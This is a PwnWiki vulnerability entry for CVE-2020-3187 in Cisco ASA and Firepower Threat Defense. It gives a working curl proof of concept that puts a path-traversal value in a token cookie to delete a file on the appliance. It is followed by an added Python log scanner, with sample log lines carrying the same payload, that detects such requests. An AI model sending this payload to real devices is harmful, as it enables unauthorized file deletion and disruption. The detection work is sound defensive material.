PWNWIK.COM
Affected systems:
Cisco Adaptive Security Appliance
Cisco Firepower Threat Defense Software
POC:
Example: deleting the logo file:
payload:
/+CSCOU+/csco_logo.gif
Run:
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://target/+CSCOE+/session_password.html
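A detection-side check, added here as an example that is not part of the original PwnWiki entry: it scans request log lines for requests to the session endpoint named above whose token cookie carries a path-traversal sequence (plain, URL-encoded or double-encoded). The one-request-per-line log format, the sample lines and the function names are assumptions made for this example; real ASA or WAF logs use a different layout.

```python
"""Flag CVE-2020-3187 style requests in a request log (added example).

Assumed (constructed) log format, one request per line:
  <client_ip> <method> <path> cookie="<raw Cookie header>"
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Endpoint used in the PoC on this page.
TARGET_PATH = "/+CSCOE+/session_password.html"

# Parser for the constructed log format above (assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) cookie="(?P<cookie>[^"]*)"$'
)

# A ".." path segment anywhere in the decoded value.
TRAVERSAL_RE = re.compile(r"(?:^|/)\.\.(?:/|$)")


def token_from_cookie(cookie: str) -> Optional[str]:
    """Return the value of the 'token' cookie, or None if absent."""
    for part in cookie.split(";"):
        name, _, value = part.strip().partition("=")
        if name.strip() == "token":
            return value.strip()
    return None


def normalize(value: str) -> str:
    """URL-decode up to twice (catches double encoding) and unify slashes."""
    prev = value
    for _ in range(2):
        cur = unquote(prev)
        if cur == prev:
            break
        prev = cur
    return prev.replace("\\", "/")


def is_traversal_attempt(token: str) -> bool:
    """True when the decoded token contains a '..' path segment."""
    return TRAVERSAL_RE.search(normalize(token)) is not None


def classify_line(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m or m["path"] != TARGET_PATH:
        return None
    token = token_from_cookie(m["cookie"])
    if token is None or not is_traversal_attempt(token):
        return None
    return {"ip": m["ip"], "token": normalize(token)}


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run classify_line over a log and keep the findings."""
    return [r for r in map(classify_line, lines) if r is not None]


# Constructed sample log: two plain-text hits, one encoded hit, two benign lines.
SAMPLE_LOG = [
    '203.0.113.5 GET /+CSCOE+/session_password.html cookie="token=../+CSCOU+/csco_logo.gif"',
    '198.51.100.7 GET /+CSCOE+/session_password.html cookie="token=%2e%2e%2f%2bCSCOU%2b%2fcsco_logo.gif"',
    '192.0.2.10 GET /+CSCOE+/session_password.html cookie="token=abc123def"',
    '192.0.2.11 GET /+CSCOE+/logon.html cookie="token=../etc/x"',
    '192.0.2.12 GET /+CSCOE+/session_password.html cookie="lang=en; token=..%2F..%2Fsomething"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"{finding['ip']} sent traversal token {finding['token']!r}")
```

The fourth sample line is deliberately ignored: the traversal is in the cookie, but the request is not for the session endpoint, so an alert keyed only on ".." in any cookie would be noisier than this check. Decoding twice before matching is what makes the double-encoded forms visible.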
References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3187
https://blog.rapid7.com/2020/05/08/may-2020-cisco-remote-vulnerabilities-guidance/
https://twitter.com/aboul3la/status/1286809567989575685
https://github.com/pry0cc/CVE-2020-3187
https://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html
Free, open, editable-by-everyone vulnerability database -- PwnWiki.com